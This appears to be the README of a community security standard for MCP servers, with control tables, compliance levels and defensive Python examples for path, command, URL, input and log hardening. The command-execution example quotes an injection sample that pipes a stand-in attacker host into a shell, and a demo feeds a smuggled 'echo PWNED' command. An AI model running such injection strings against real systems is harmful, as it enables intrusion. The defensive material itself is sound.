The Model Context Protocol enables AI models to interact with external systems through tools, resources, and prompts. As adoption accelerates, critical vulnerabilities have emerged: command injection, path traversal, SSRF attacks, and supply chain compromises.
MSSS provides:
- 24 security controls across 8 domains
- 4 compliance levels (L1-Essential, L2-Development, L3-Production, L4-Maximum Assurance)
- Risk-based level selection framework inspired by NIST CSF, OWASP ASVS, and CIS Controls
- 6 deployment profiles (Local Dev, Team Server, Internet-Facing, etc.)
- Evidence-based verification with clear acceptance criteria
- Machine-readable reporting through JSON schemas
The following platforms have adopted the MCP Server Security Standard:
| Platform | Description | Status |
|---|---|---|
| MCP-Hub | MCP server directory and marketplace — discover, publish, and manage MCP-compliant servers | ✅ Compliant |
Are you implementing MSSS? Open an issue or submit a PR to be listed here.
Released: January 15, 2026 (Community Review Draft)
- Core standard framework (msss.md)
- 6 deployment profiles defined
- Comprehensive threat model
- 23 fully documented security controls
- JSON reporting schemas
- i18n framework for translations
- Implementation examples for common frameworks
- Automated verification tools
- Reference assessment reports
- Translations to other languages
- Real-world testing and feedback
- Review deployment profiles to find your scenario
- Implement controls from control catalog
- Use reporting schemas for assessment
- Share your experience via issues or discussions
```bash
# Fork and clone
git clone https://github.com/YOUR-USERNAME/mcp-server-security-standard
cd mcp-server-security-standard
# Start a translation
mkdir -p v0.1/i18n/es/standard
```
- Report vulnerabilities: security@mcp-security-standard.org
- Share attack patterns: Open an issue with the `threat-research` label
- Propose new controls: See contributing guide
MSSS defines four compliance levels using a risk-based selection model (not maturity progression). Organizations select their target level based on deployment context, data sensitivity, and potential impact.
| Level | Target Audience | Controls | Validation | Timeline |
|---|---|---|---|---|
| L1: Essential | Personal/Hobby | 6 (25%) | Self-assessment | 1-2 hours |
| L2: Development | Internal/Team | 12 (50%) | Self + scanning | 4-8 hours |
| L3: Production | Enterprise/Customers | 18 (75%) | Internal audit | 1-2 weeks |
| L4: Maximum Assurance | Critical/Regulated | 24 (100%) | Third-party pentest | 4-8 weeks |
Choose your level based on 4 key questions:
- Who uses it? Individual → L1 | Team → L2 | Organization/Customers → L3 | Public/Regulated → L4
- What data? Public → L1 | Internal → L2 | Business/PII → L3 | Regulated (PHI/PCI) → L4
- Impact if compromised? Inconvenience → L1 | Dev delays → L2 | Disruption → L3 | Severe harm → L4
- Threat model? Opportunistic → L1 | Semi-targeted → L2 | Targeted → L3 | APT → L4
Level 1 (Essential)
- Essential protection for personal tools and hobby projects
- Prevents: Command injection, path traversal, SSRF, credential leaks
- Key controls: No shell execution, path allowlisting, URL validation, schema validation, secret redaction
Level 2 (Development)
- Security for development teams and internal tools
- Adds: TLS enforcement, input bounds, timeouts, command allowlisting, trusted sources
- Required for: Team projects, internal apps, pre-production environments
Level 3 (Production)
- Comprehensive security for enterprise and customer-facing applications
- Adds: OAuth authentication, RBAC, audit logging, container hardening
- Required for: SaaS products, customer data, business-confidential information
Level 4 (Maximum Assurance)
- Maximum hardening for critical infrastructure and regulated environments
- Adds: Filesystem sandboxing, egress filtering, seccomp/AppArmor, runtime monitoring
- Required for: HIPAA (healthcare), PCI DSS (payments), FedRAMP (government)
📖 Full documentation: See Compliance Levels and Control-Level Mapping
- HIPAA (Healthcare): Level 4 minimum for PHI access
- PCI DSS (Payments): Level 4 minimum for cardholder data
- SOC 2 (SaaS): Level 3 minimum
- ISO 27001: Level 3 minimum for certification
- FedRAMP: Low→L3, Moderate/High→L4
| Control | Level | Description |
|---|---|---|
| MCP-FS-01 | L1 | Path allowlisting to prevent unauthorized file access |
| MCP-FS-02 | L1 | Symlink resolution to prevent path traversal via symbolic links |
| MCP-FS-03 | L4 | Filesystem sandboxing for complete isolation |
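The two L1 filesystem controls above are a single check in practice: canonicalise the caller's path (symlinks followed, `..` collapsed) and then test containment component-wise against the allowed roots. The following is an added example written for this page, not code from the MSSS repository; `resolve_allowed()`, `is_allowed()` and the temporary fixture in `demo()` are this example's own names and constructed data.

```python
import os
import tempfile
from pathlib import Path

# Added example (not MSSS reference code): resolve_allowed() and is_allowed()
# are this example's own names.


class PathDenied(PermissionError):
    """Raised when a tool-supplied path resolves outside every allowed root."""


def resolve_allowed(user_path: str, allowed_roots: list[str]) -> Path:
    """Return the canonical path if it lies under an allowed root, else raise."""
    # Canonicalise the roots too, so a root that is itself a symlink (e.g. /tmp
    # on macOS) compares consistently with the resolved target.
    roots = [Path(os.path.realpath(r)) for r in allowed_roots]
    # realpath() follows every symlink component and collapses "..", so the
    # comparison sees where the file really lives, not how the caller spelled it.
    target = Path(os.path.realpath(user_path))
    for root in roots:
        try:
            # relative_to() compares whole path components: "/data-other" is
            # NOT under "/data", which a naive str.startswith("/data") accepts.
            target.relative_to(root)
            return target
        except ValueError:
            continue
    raise PathDenied(f"{user_path!r} resolves outside the allowed roots")


def is_allowed(user_path: str, allowed_roots: list[str]) -> bool:
    try:
        resolve_allowed(user_path, allowed_roots)
        return True
    except PathDenied:
        return False


def demo() -> dict[str, bool]:
    """Constructed fixture: a sandbox root, a symlink that escapes it, and a
    sibling directory whose name shares the root's prefix."""
    with tempfile.TemporaryDirectory() as tmp:
        sandbox = Path(tmp) / "sandbox"
        outside = Path(tmp) / "outside"
        sibling = Path(tmp) / "sandbox-other"
        for d in (sandbox, outside, sibling):
            d.mkdir()
        (sandbox / "notes.txt").write_text("ok")
        (outside / "secret.txt").write_text("not for the model")
        (sandbox / "escape").symlink_to(outside)   # symlink pointing out of the root
        roots = [str(sandbox)]
        return {
            "plain_file": is_allowed(str(sandbox / "notes.txt"), roots),
            "dotdot": is_allowed(f"{sandbox}/../outside/secret.txt", roots),
            "symlink_escape": is_allowed(str(sandbox / "escape" / "secret.txt"), roots),
            "prefix_sibling": is_allowed(str(sibling / "x.txt"), roots),
            "new_file_inside": is_allowed(str(sandbox / "new" / "file.txt"), roots),
        }


if __name__ == "__main__":
    print(demo())
```

The check is still check-then-use: a symlink swapped in between `realpath()` and the subsequent `open()` is not caught. Where that race matters, open the resolved path with `O_NOFOLLOW`, or on Linux 5.6+ use `openat2()` with `RESOLVE_BENEATH`, which enforces containment atomically.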
| Control | Level | Description |
|---|---|---|
| MCP-EXEC-01 | L1 | Avoid shell execution to prevent command injection |
| MCP-EXEC-02 | L2 | Command allowlisting for permitted executables |
| MCP-EXEC-03 | L2 | Argument separation to prevent injection attacks |
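The three execution controls fit together as: never hand a string to a shell, only ever execute binaries from a fixed list, and pass caller data as separate argv entries after `--` so it cannot be read as an option. The following is an added example for this page, not code from the MSSS repository; `ALLOWED_COMMANDS`, `build_argv()`, `run_allowed()` and the test file in `demo()` are this example's own names and constructed input. The `timeout` shown also serves MCP-INPUT-03.

```python
import os
import shutil
import subprocess
import tempfile

# Added example (not MSSS reference code). ALLOWED_COMMANDS, build_argv() and
# run_allowed() are this example's own names.


# BEFORE (MCP-EXEC-01 violation): the string is handed to /bin/sh, so a
# pattern such as 'x; curl attacker.example | sh' runs a second command.
def grep_vulnerable(pattern: str, path: str) -> str:
    return subprocess.run(f"grep -n {pattern} {path}", shell=True,
                          capture_output=True, text=True).stdout


# AFTER: executables are resolved to absolute paths once at startup, so a
# later PATH change cannot swap in a different binary (MCP-EXEC-02).
ALLOWED_COMMANDS = {name: shutil.which(name) for name in ("grep", "wc")}


class CommandDenied(PermissionError):
    pass


def build_argv(command: str, flags: list[str], operands: list[str]) -> list[str]:
    """Assemble argv: allowlisted executable, server-chosen flags, then '--' and
    caller-supplied operands, which can therefore never be parsed as options."""
    exe = ALLOWED_COMMANDS.get(command)
    if not exe:
        raise CommandDenied(f"{command!r} is not an allowlisted executable")
    for flag in flags:          # flags are chosen by the tool code, never by the caller
        if not flag.startswith("-") or flag == "--":
            raise CommandDenied(f"unexpected flag {flag!r}")
    for operand in operands:    # caller data: reject NUL, which execve cannot carry
        if "\0" in operand:
            raise CommandDenied("NUL byte in operand")
    return [exe, *flags, "--", *operands]


def run_allowed(command: str, flags: list[str], operands: list[str],
                timeout: float = 5.0) -> subprocess.CompletedProcess:
    argv = build_argv(command, flags, operands)
    # shell=False (the default): argv goes straight to execve, so there is no
    # word splitting, globbing or ';' / '|' interpretation. The timeout bounds
    # runaway jobs (MCP-INPUT-03); close_fds stops inherited descriptors leaking.
    return subprocess.run(argv, capture_output=True, text=True,
                          timeout=timeout, check=False, close_fds=True)


def demo() -> dict[str, str]:
    """Constructed input: a two-line file and a pattern carrying a shell injection."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("needle\nhay\n")
        path = f.name
    try:
        benign = run_allowed("grep", ["-c"], ["needle", path])
        hostile = run_allowed("grep", ["-c"], ["needle; echo PWNED", path])
    finally:
        os.unlink(path)
    # grep searched for the literal string 'needle; echo PWNED' and found nothing;
    # under shell=True the same input would have run 'echo PWNED' as a command.
    return {"benign": benign.stdout.strip(), "hostile": hostile.stdout.strip()}


if __name__ == "__main__":
    print(demo())
```

The `--` separator matters even without a shell: `grep` given an operand of `-r` or `--file=/etc/shadow` would otherwise treat it as an option. Argument separation protects against command injection, not against every argument the allowlisted binary accepts, so keep the flag set fixed and the operands last.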
| Control | Level | Description |
|---|---|---|
| MCP-NET-01 | L1 | URL validation to prevent SSRF attacks |
| MCP-NET-02 | L4 | Egress traffic filtering with destination allowlists |
| MCP-NET-03 | L2 | TLS 1.2+ enforcement for all remote connections |
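MCP-NET-01 and MCP-NET-03 combine into one outbound-URL gate: an `https`-only scheme check, a port allowlist, rejection of userinfo tricks, and, crucially, resolution of the hostname so that every returned address is checked against loopback, link-local (including the cloud metadata address 169.254.169.254), private and other non-public ranges. The following is an added example for this page, not code from the MSSS repository; `validate_outbound_url()`, `is_url_allowed()` and the `FAKE_DNS` table with its resolver are this example's own, constructed so it runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Added example (not MSSS reference code): validate_outbound_url(), is_url_allowed()
# and the FAKE_DNS table are this example's own, constructed for offline use.

ALLOWED_SCHEMES = {"https"}   # cleartext http is refused outright (MCP-NET-03)
ALLOWED_PORTS = {443}


class UrlDenied(ValueError):
    pass


def _is_public(ip) -> bool:
    # An IPv4-mapped IPv6 literal such as ::ffff:127.0.0.1 must be judged as 127.0.0.1.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    # is_global is False for loopback, link-local (incl. 169.254.169.254),
    # RFC 1918, unique-local, multicast, reserved and unspecified addresses.
    return ip.is_global


def _system_resolver(host: str) -> list[str]:
    return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})


def validate_outbound_url(url: str, resolver=_system_resolver) -> tuple[str, str]:
    """Return (hostname, pinned_ip) for a URL the tool may fetch, or raise UrlDenied."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise UrlDenied(f"scheme {parts.scheme!r} not allowed")
    if parts.username is not None or parts.password is not None:
        raise UrlDenied("userinfo in URL not allowed")   # e.g. https://trusted.example@10.0.0.1/
    host = parts.hostname
    if not host:
        raise UrlDenied("missing host")
    try:
        port = parts.port or 443
    except ValueError as e:
        raise UrlDenied(f"bad port: {e}")
    if port not in ALLOWED_PORTS:
        raise UrlDenied(f"port {port} not allowed")
    # A literal address is checked directly; a hostname is resolved and EVERY
    # answer must be public, or one private A record steers the request inside.
    try:
        addrs = [ipaddress.ip_address(host)]
    except ValueError:
        addrs = [ipaddress.ip_address(a) for a in resolver(host)]
    if not addrs:
        raise UrlDenied(f"{host} did not resolve")
    for ip in addrs:
        if not _is_public(ip):
            raise UrlDenied(f"{host} resolves to non-public address {ip}")
    return host, str(addrs[0])


def is_url_allowed(url: str, resolver=_system_resolver) -> bool:
    try:
        validate_outbound_url(url, resolver)
        return True
    except UrlDenied:
        return False


# Constructed DNS answers so the example runs offline; real code uses _system_resolver.
FAKE_DNS = {
    "api.example.com": ["93.184.216.34"],
    "metadata.internal.example": ["169.254.169.254"],
    "rebind.example": ["93.184.216.34", "10.0.0.5"],   # mixed public/private answer set
}


def fake_resolver(host: str) -> list[str]:
    if host not in FAKE_DNS:
        raise UrlDenied(f"unknown host {host}")
    return FAKE_DNS[host]


if __name__ == "__main__":
    for u in ("https://api.example.com/v1", "https://metadata.internal.example/",
              "http://api.example.com/", "https://[::ffff:127.0.0.1]/"):
        print(u, is_url_allowed(u, fake_resolver))
```

The returned `pinned_ip` is what the HTTP client should actually connect to (with `Host`/SNI set to the hostname); resolving a second time inside the client reopens the window for DNS rebinding between check and connect. Each redirect hop needs to go through the same validation, since a public host can 302 to an internal address.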
| Control | Level | Description |
|---|---|---|
| MCP-AUTHZ-01 | L3 | OAuth 2.1 delegation for secure authentication |
| MCP-AUTHZ-02 | L3 | Per-tool scope definition with granular permissions |
| MCP-AUTHZ-03 | L3 | Least privilege tool design principles |
| MCP-AUTHZ-04 | L3 | Resource-based access control (RBAC) |
| Control | Level | Description |
|---|---|---|
| MCP-INPUT-01 | L1 | JSON Schema validation for all tool arguments |
| MCP-INPUT-02 | L2 | Input bounds checking to prevent DoS attacks |
| MCP-INPUT-03 | L2 | Timeout enforcement for resource exhaustion prevention |
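MCP-INPUT-01 and MCP-INPUT-02 are enforced in one pipeline: cap the raw payload size before it is parsed, parse it, then validate against the tool's declared JSON Schema, rejecting unknown properties and out-of-range sizes and values. The following is an added example for this page, not code from the MSSS repository; `SEARCH_TOOL_SCHEMA`, `validate()` and `parse_tool_arguments()` are this example's own, and the validator deliberately implements only the JSON Schema keywords the bounds checks need rather than the full specification.

```python
import json

# Added example (not MSSS reference code): SEARCH_TOOL_SCHEMA, validate() and
# parse_tool_arguments() are this example's own. The validator covers only the
# JSON Schema keywords used below, which is what the bounds checks need.

MAX_REQUEST_BYTES = 64 * 1024     # MCP-INPUT-02: bound the raw payload before parsing

# A tool's inputSchema as an MCP server would publish it (constructed here).
SEARCH_TOOL_SCHEMA = {
    "type": "object",
    "properties": {
        "query": {"type": "string", "minLength": 1, "maxLength": 256},
        "limit": {"type": "integer", "minimum": 1, "maximum": 100},
        "tags": {"type": "array", "maxItems": 10,
                 "items": {"type": "string", "maxLength": 32}},
    },
    "required": ["query"],
    "additionalProperties": False,   # unknown keys are rejected, not ignored
}


class InvalidInput(ValueError):
    pass


_TYPES = {"string": str, "integer": int, "number": (int, float),
          "boolean": bool, "array": list, "object": dict}


def validate(value, schema: dict, path: str = "$") -> None:
    """Raise InvalidInput on the first violation; the message names the JSON path."""
    t = schema.get("type")
    if t is not None:
        # bool is a subclass of int in Python but a distinct type in JSON Schema.
        if isinstance(value, bool) and t in ("integer", "number"):
            raise InvalidInput(f"{path}: expected {t}, got boolean")
        if not isinstance(value, _TYPES[t]):
            raise InvalidInput(f"{path}: expected {t}")
    if t == "string":
        if len(value) < schema.get("minLength", 0):
            raise InvalidInput(f"{path}: shorter than minLength")
        if len(value) > schema.get("maxLength", float("inf")):
            raise InvalidInput(f"{path}: exceeds maxLength")
    elif t in ("integer", "number"):
        if value < schema.get("minimum", float("-inf")):
            raise InvalidInput(f"{path}: below minimum")
        if value > schema.get("maximum", float("inf")):
            raise InvalidInput(f"{path}: above maximum")
    elif t == "array":
        if len(value) > schema.get("maxItems", float("inf")):
            raise InvalidInput(f"{path}: exceeds maxItems")
        for i, item in enumerate(value):
            validate(item, schema.get("items", {}), f"{path}[{i}]")
    elif t == "object":
        props = schema.get("properties", {})
        for name in schema.get("required", []):
            if name not in value:
                raise InvalidInput(f"{path}: missing required '{name}'")
        for key, item in value.items():
            if key in props:
                validate(item, props[key], f"{path}.{key}")
            elif schema.get("additionalProperties", True) is False:
                raise InvalidInput(f"{path}: unexpected property '{key}'")


def parse_tool_arguments(raw: bytes, schema: dict = SEARCH_TOOL_SCHEMA) -> dict:
    """Size check first, then parse, then schema check, so the handler only ever
    sees arguments that are within bounds."""
    if len(raw) > MAX_REQUEST_BYTES:
        raise InvalidInput(f"payload of {len(raw)} bytes exceeds {MAX_REQUEST_BYTES}")
    try:
        args = json.loads(raw)
    except (ValueError, RecursionError) as e:   # malformed or absurdly nested JSON
        raise InvalidInput(f"malformed JSON: {e}")
    validate(args, schema)
    return args


def is_valid(raw: bytes, schema: dict = SEARCH_TOOL_SCHEMA) -> bool:
    try:
        parse_tool_arguments(raw, schema)
        return True
    except InvalidInput:
        return False
```

Production servers should use a full JSON Schema validator rather than this subset, but the ordering is the point: the byte cap runs before `json.loads` (a parser cannot defend itself against a payload it has already been asked to build), and `additionalProperties: false` turns unexpected keys into hard errors instead of silent passthrough to the handler.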
| Control | Level | Description |
|---|---|---|
| MCP-LOG-01 | L3 | Comprehensive audit logging for all tool invocations |
| MCP-LOG-02 | L1 | Automatic secret redaction in logs |
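An audit record (MCP-LOG-01) and secret redaction (MCP-LOG-02) need to be designed together, otherwise the audit log becomes the place where tool arguments leak credentials. The following is an added example for this page, not code from the MSSS repository; the pattern list, `redact()`, `redact_value()`, `audit_record()` and the invocation in `demo()` are this example's own names and constructed data. Redaction is applied twice: structurally, by key name, to the argument dictionary, and then as a regex pass over every fully formatted log line.

```python
import io
import json
import logging
import re
import time

# Added example (not MSSS reference code): the regex list, redact(),
# redact_value(), audit_record() and demo() are this example's own.

# Free-text scrubbing for anything that reaches a log line (MCP-LOG-02).
SECRET_PATTERNS = [
    (re.compile(r"(?i)\b(bearer)\s+[A-Za-z0-9\-._~+/]+=*"), r"\1 [REDACTED]"),
    (re.compile(r"\bAKIA[0-9A-Z]{16}\b"), "[REDACTED_AWS_KEY]"),
    (re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36,}\b"), "[REDACTED_GITHUB_TOKEN]"),
    (re.compile(r"(?i)\b(api[_-]?key|password|secret|token)(\s*[=:]\s*)\S+"), r"\1\2[REDACTED]"),
]
# Structural redaction for argument dictionaries: the key name, not the value
# shape, decides, so short or oddly formatted secrets are still caught.
SENSITIVE_KEY = re.compile(r"(?i)(pass(word)?|secret|token|api[_-]?key|authorization|cookie)")


def redact(text: str) -> str:
    for pattern, replacement in SECRET_PATTERNS:
        text = pattern.sub(replacement, text)
    return text


def redact_value(obj):
    if isinstance(obj, dict):
        return {k: "[REDACTED]" if SENSITIVE_KEY.search(k) else redact_value(v)
                for k, v in obj.items()}
    if isinstance(obj, list):
        return [redact_value(v) for v in obj]
    if isinstance(obj, str):
        return redact(obj)
    return obj


class RedactingFormatter(logging.Formatter):
    """Last line of defence: scrub the fully formatted record, so a message that
    interpolated a secret via %-args is still caught."""
    def format(self, record: logging.LogRecord) -> str:
        return redact(super().format(record))


def audit_record(tool: str, principal: str, args: dict, outcome: str,
                 duration_ms: int, request_id: str) -> dict:
    """One JSON-serialisable audit event per tool invocation (MCP-LOG-01):
    who called what, with which (redacted) arguments, and how it ended."""
    return {
        "ts": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
        "event": "tool_call",
        "request_id": request_id,
        "principal": principal,
        "tool": tool,
        "args": redact_value(args),
        "outcome": outcome,
        "duration_ms": duration_ms,
    }


def make_audit_logger(stream) -> logging.Logger:
    handler = logging.StreamHandler(stream)
    handler.setFormatter(RedactingFormatter("%(message)s"))
    logger = logging.getLogger("msss.audit")
    logger.handlers = [handler]
    logger.propagate = False
    logger.setLevel(logging.INFO)
    return logger


def demo() -> str:
    """Constructed invocation whose arguments carry a password and an AWS key id."""
    stream = io.StringIO()
    logger = make_audit_logger(stream)
    rec = audit_record(
        tool="read_file", principal="user:alice", request_id="req-0001",
        args={"path": "/data/a.txt", "password": "hunter2",
              "note": "deploy with AKIAIOSFODNN7EXAMPLE"},
        outcome="ok", duration_ms=12)
    logger.info(json.dumps(rec, sort_keys=True))
    # A careless debug line that interpolates a bearer token is scrubbed too.
    logger.info("upstream call with Authorization: Bearer %s", "eyJhbGciOiJIUzI1NiJ9.abc.def")
    return stream.getvalue()


if __name__ == "__main__":
    print(demo(), end="")
```

Regex lists only catch secrets whose shape is known, which is why the key-name pass over the argument dictionary comes first; the formatter pass is there for free-text messages that bypassed it. Keep the audit line as one JSON object per invocation so the fields (principal, tool, outcome, duration) can be queried later without re-parsing prose.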
| Control | Level | Description |
|---|---|---|
| MCP-SUPPLY-01 | L4 | Package integrity verification with checksums |
| MCP-SUPPLY-02 | L2 | Trusted package sources and registry verification |
| Control | Level | Description |
|---|---|---|
| MCP-DEPLOY-01 | L3 | Container hardening with security best practices |
| MCP-DEPLOY-02 | L4 | System call filtering via seccomp/AppArmor |
| MCP-DEPLOY-03 | L4 | Resource limits and rate limiting for DoS prevention |
Total: 24 controls across 8 security domains. The tables above list the 23 controls documented in this release (see the release notes); the per-level totals below count all 24, and since L1 through L3 sum to 18 as listed, the undocumented control is an L4 control.
- Level 1: 6 controls (25%) - Essential baseline
- Level 2: 12 controls (50%) - Development protection
- Level 3: 18 controls (75%) - Production security
- Level 4: 24 controls (100%) - Maximum assurance
We follow a simple process:
- Pick an area - Check issues labeled `help-wanted` or `good-first-issue`
- Discuss - Open an issue or join discussions before major work
- Submit - Create a PR with clear description
- Iterate - Address feedback from reviewers
HIGH PRIORITY
- Add real-world implementation examples
- Create reference implementations for common frameworks
- Test controls against production deployments
MEDIUM PRIORITY
- Add profile-specific guidance
- Start Spanish, Portuguese, or other translations
- Develop automated verification tools
ALWAYS WELCOME
- Fix typos and improve clarity
- Add references to new CVEs or research
- Share implementation experiences
- Discussions: GitHub Discussions - Ask questions, share ideas
- Issues: GitHub Issues - Report bugs, request features
Looking for Co-Maintainers! If you're passionate about MCP security and want to help shape this standard, please reach out.
All contributors will be recognized in:
- CHANGELOG.md for significant contributions
- Control documents you author or substantially improve
- Gather feedback on 23 controls
- Validate against real-world deployments
- Collect implementation experiences
- Incorporate community feedback
- Add controls for emerging threats
- Publish reference implementations
- Launch translation program
- Stable specification
- Automated verification tools
- Certification program framework
- Training materials
MSSS complements:
- OWASP MCP Top 10 - Risk categories
- OWASP ASVS - Verification standard
- CWE - Weakness enumeration
- NIST Cybersecurity Framework - Risk management
MSSS uses a multi-license approach:
| Component | License | Purpose |
|---|---|---|
| Standard Text | CC BY-SA 4.0 | Free sharing with attribution |
| JSON Schemas | Apache 2.0 | Commercial tool integration |
| Code Examples | MIT | Maximum flexibility |
See the full license text in the LICENSE file.
- Star this repository - Help others discover MSSS
- Share with your network - Spread awareness
- Contribute - Your expertise makes MSSS better
MSSS builds upon:
- Security researchers who disclosed MCP vulnerabilities
- OWASP MCP Top 10 community
- Early adopters providing feedback
- Academic researchers (MCPLIB, Hou et al.)
The MCP Server Security Standard is an open community project. We provide this standard as-is without warranties. Use at your own discretion.